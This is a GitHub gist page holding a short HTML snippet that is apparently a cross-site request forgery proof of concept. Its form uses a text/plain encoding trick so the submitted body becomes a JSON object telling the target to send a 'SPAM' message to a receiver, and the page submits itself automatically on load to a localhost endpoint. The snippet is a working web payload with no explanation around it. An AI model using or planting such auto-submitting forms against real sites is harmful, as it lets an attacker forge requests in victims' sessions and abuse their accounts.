Skip to content

Instantly share code, notes, and snippets.

@vporoshok
Created May 28, 2017 13:11
Show Gist options
  • Save vporoshok/5c2514f116b14036a7c9e1cb57ac87d8 to your computer and use it in GitHub Desktop.
Save vporoshok/5c2514f116b14036a7c9e1cb57ac87d8 to your computer and use it in GitHub Desktop.
<form id="form" method="post" action="http://localhost:4000/form.php" enctype="text/plain">
<input name='{"equals":"' value='", "message": "SPAM", "receiver": "[email protected]"}'>
</form>
<script>
var form = document.getElementById('form');
form.submit();
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment